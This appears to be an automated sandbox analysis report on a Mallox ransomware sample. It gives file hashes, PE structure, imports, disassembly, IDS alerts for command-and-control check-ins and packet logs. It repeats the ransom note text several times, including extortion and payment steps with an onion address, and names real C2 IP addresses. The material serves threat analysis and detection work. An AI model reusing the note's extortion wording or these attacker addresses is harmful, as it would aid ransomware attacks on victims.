                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\OneDrive\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Pictures\Camera Roll\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Pictures\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Pictures\Saved Pictures\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Recent\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Saved Games\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Searches\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\Videos\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    Static File Info

                    General

                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                    Entropy (8bit):6.287523841585097
                    TrID:
                    • Win64 Executable GUI (202006/5) 92.65%
                    • Win64 Executable (generic) (12005/4) 5.51%
                    • Generic Win/DOS Executable (2004/3) 0.92%
                    • DOS Executable Generic (2002/1) 0.92%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:Ransomware Mallox.exe
                    File size:354'304 bytes
                    MD5:9099859494363864de61fb30d6c201e6
                    SHA1:90378c5fd151128287c12eea0ea3761833b0ad03
                    SHA256:06699c98ed2ef759b2434ac5777a2886b966c0ffa1c96c046f5cde77fe833784
                    SHA512:cae8c4970c6d8891d2da8924e6ba2331242c112ee5eec5823d8e55c29b40822b0f4287b64e5b6b5d71c0aa2cb8b998ac4533e2dd6326af820f29e9e5eadd59ba
                    SSDEEP:6144:lbjhsyXpHunpQE/T/iSIDexeohXdbVeb:7XpOpplI8eoT
                    TLSH:04748D69F7E518F8E4B78278C9774606DB72BC990771C76F2364421A1F336908D3AB22
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v..k...k...k.......k......2k.......k.......k.......k.......k.......k.......k...k..Nk..\....k..\....k..Rich.k.................

                    File Icon

                    Icon Hash:90cececece8e8eb0

                    Static PE Info

                    General

                    Entrypoint:0x14001ad04
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x140000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x65135725 [Tue Sep 26 22:11:49 2023 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:4bd606c718af0826328ff544bde85fea

                    Entrypoint Preview

                    Instruction
                    dec eax
                    sub esp, 28h
                    call 00007F3D48E683E8h
                    dec eax
                    add esp, 28h
                    jmp 00007F3D48E67DFFh
                    int3
                    int3
                    and dword ptr [00039B81h], 00000000h
                    ret
                    dec eax
                    mov dword ptr [esp+08h], ebx
                    push ebp
                    dec eax
                    lea ebp, dword ptr [esp-000004C0h]
                    dec eax
                    sub esp, 000005C0h
                    mov ebx, ecx
                    mov ecx, 00000017h
                    call dword ptr [0001C75Eh]
                    test eax, eax
                    je 00007F3D48E67F86h
                    mov ecx, ebx
                    int 29h
                    mov ecx, 00000003h
                    call 00007F3D48E67F49h
                    xor edx, edx
                    dec eax
                    lea ecx, dword ptr [ebp-10h]
                    inc ecx
                    mov eax, 000004D0h
                    call 00007F3D48E698C0h
                    dec eax
                    lea ecx, dword ptr [ebp-10h]
                    call dword ptr [0001C709h]
                    dec eax
                    mov ebx, dword ptr [ebp+000000E8h]
                    dec eax
                    lea edx, dword ptr [ebp+000004D8h]
                    dec eax
                    mov ecx, ebx
                    inc ebp
                    xor eax, eax
                    call dword ptr [0001C6F7h]
                    dec eax
                    test eax, eax
                    je 00007F3D48E67FBEh
                    dec eax
                    and dword ptr [esp+38h], 00000000h
                    dec eax
                    lea ecx, dword ptr [ebp+000004E0h]
                    dec eax
                    mov edx, dword ptr [ebp+000004D8h]
                    dec esp
                    mov ecx, eax
                    dec eax
                    mov dword ptr [esp+30h], ecx
                    dec esp
                    mov eax, ebx
                    dec eax
                    lea ecx, dword ptr [ebp+000004E8h]
                    dec eax
                    mov dword ptr [esp+28h], ecx
                    dec eax
                    lea ecx, dword ptr [ebp-10h]
                    dec eax
                    mov dword ptr [esp+20h], ecx
                    xor ecx, ecx
                    call dword ptr [0001C6BEh]
                    dec eax

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x511ac0xc8.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5b0000x294c.pdata
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f0000xef4.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x4ce400x38.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4d0000x28.rdata
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4ce800x138.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x370000x650.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x35b480x35c002a6a1cb7f87491a1cb023cf985f699c3False0.5374909156976744data6.554705414547306IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x370000x1b74e0x1b800d686349860b3615a6cfa8501c60f3c7eFalse0.41923828125data4.965134701094027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x530000x7e6c0x140060ddfa8df67e1a2954498f41e81160e9False0.172265625data2.890313720462923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .pdata0x5b0000x294c0x2a0005c1886859ca0374e57f3b250c5d4cb0False0.4732142857142857data5.488057275468043IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    _RDATA0x5e0000xfc0x200a3a1f72434b7ce7d5090ff135016145dFalse0.3203125data2.4524994986336286IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x5f0000xef40x1000a4e1a4b83b03efd16ac28f2f80c8771dFalse0.437744140625data5.304977907639923IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Imports

                    DLLImport
                    KERNEL32.dllSleep, CreateFileA, SetEvent, GetDiskFreeSpaceExW, GetCurrentThread, TerminateThread, LoadLibraryA, GetNativeSystemInfo, CreateThread, GetWindowsDirectoryA, SetVolumeMountPointW, GetWindowsDirectoryW, GetProcAddress, SetFilePointerEx, DeleteCriticalSection, ExitProcess, GetCurrentProcessId, GetModuleHandleW, CopyFileW, WideCharToMultiByte, GetVolumePathNamesForVolumeNameW, lstrcpyW, SleepEx, GetDiskFreeSpaceExA, CreateEventA, FindNextVolumeW, lstrcmpiW, CreateIoCompletionPort, GetTickCount, lstrcmpW, MoveFileW, GetDriveTypeW, GetFileTime, GetComputerNameA, TerminateProcess, OpenProcess, MultiByteToWideChar, Process32NextW, QueryDosDeviceW, DuplicateHandle, CreateEventW, FindVolumeClose, GetFileType, GetTickCount64, lstrcatW, GetSystemInfo, GlobalMemoryStatusEx, WriteConsoleW, SetEndOfFile, ReadConsoleW, HeapSize, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, SetFileAttributesW, PostQueuedCompletionStatus, GetLocaleInfoA, GetModuleHandleA, GetCurrentThreadId, GetFileAttributesW, CreateFileW, WaitForSingleObject, FindClose, lstrlenA, GetQueuedCompletionStatus, SetErrorMode, InitializeCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetModuleFileNameW, GetUserDefaultLangID, WriteFile, FindNextFileW, GetCommandLineW, EnterCriticalSection, lstrlenW, FindFirstVolumeW, FindFirstFileExW, GetFileSizeEx, GetLogicalDrives, GetVolumeInformationW, ReadFile, LocalFree, CloseHandle, GetLastError, GetCurrentProcess, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, QueryPerformanceCounter, CreateToolhelp32Snapshot, HeapAlloc, HeapFree, HeapReAlloc, GetStdHandle, GetModuleHandleExW, LoadLibraryExW, FreeLibrary, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, ResetEvent, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, GetStringTypeW, InitializeCriticalSectionEx, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError
                    USER32.dllCreateWindowExW, GetCursorPos, MessageBoxW, DefWindowProcW, RegisterClassW
                    ADVAPI32.dllCryptAcquireContextW, OpenProcessToken, SetNamedSecurityInfoW, ControlService, EnumDependentServicesW, QueryServiceConfigW, ChangeServiceConfigW, OpenServiceW, EnumServicesStatusW, QueryServiceStatusEx, CreateServiceW, RegCloseKey, CloseServiceHandle, RegQueryValueExA, CryptGenRandom, OpenSCManagerW, RegSetValueExW, StartServiceW, RegOpenKeyExA, RegOpenKeyExW, OpenThreadToken, CryptReleaseContext, GetTokenInformation, LookupPrivilegeValueW, AdjustTokenPrivileges, AllocateAndInitializeSid, SetEntriesInAclW, FreeSid
                    SHELL32.dllCommandLineToArgvW, ShellExecuteW
                    NETAPI32.dllNetShareEnum, NetApiBufferFree
                    SHLWAPI.dllwnsprintfA, StrCmpNIW, StrCmpNW, StrStrIW, PathFileExistsW, SHDeleteKeyW, UrlUnescapeA, UrlEscapeA, wnsprintfW
                    IPHLPAPI.DLLGetIpNetTable
                    WS2_32.dllinet_ntoa
                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetConnectW, InternetSetOptionW, InternetCrackUrlW, InternetOpenW, InternetQueryOptionW, HttpOpenRequestW, InternetReadFile, HttpSendRequestW

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-11-05T13:23:27.093029+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104978191.215.85.14280TCP
                    2024-11-05T13:23:28.271153+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104978891.215.85.14280TCP
                    2024-11-05T13:23:30.208228+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104980291.215.85.14280TCP
                    2024-11-05T13:23:31.457212+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104980891.215.85.14280TCP
                    2024-11-05T13:23:32.564101+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104981991.215.85.14280TCP
                    2024-11-05T13:23:33.958951+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104982591.215.85.14280TCP
                    2024-11-05T13:23:35.756816+01002039815ET MALWARE Win32/Filecoder.OJC CnC Checkin1192.168.2.104983891.215.85.14280TCP
                    2024-11-05T13:23:35.895424+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.1049826TCP
                    2024-11-05T13:24:14.899845+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.1049994TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 5, 2024 13:23:24.832098007 CET4976980192.168.2.10104.26.12.205
                    Nov 5, 2024 13:23:24.837521076 CET8049769104.26.12.205192.168.2.10
                    Nov 5, 2024 13:23:24.837718964 CET4976980192.168.2.10104.26.12.205
                    Nov 5, 2024 13:23:24.837909937 CET4976980192.168.2.10104.26.12.205
                    Nov 5, 2024 13:23:24.842813015 CET8049769104.26.12.205192.168.2.10
                    Nov 5, 2024 13:23:25.543059111 CET8049769104.26.12.205192.168.2.10
                    Nov 5, 2024 13:23:25.556324959 CET4976980192.168.2.10104.26.12.205
                    Nov 5, 2024 13:23:26.191431999 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:26.196254969 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:26.196475029 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:26.198463917 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:26.203358889 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.088351011 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.088594913 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.089068890 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.089334011 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.089859962 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.089871883 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.090830088 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.090842009 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.091964960 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.091976881 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.093029022 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.093765020 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.358820915 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.364276886 CET804978191.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.364300013 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.365767002 CET4978180192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.369313002 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:27.375403881 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.400510073 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:27.405335903 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.270083904 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.270253897 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.270766973 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.270956039 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.270967007 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.271152973 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:28.271835089 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.271847010 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.272110939 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:28.272660017 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.272672892 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.272685051 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:28.274734020 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:28.981560946 CET49801135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:29.299567938 CET4978880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:29.304893017 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:29.305373907 CET804978891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:29.306438923 CET4978880192.168.2.1091.215.85.142
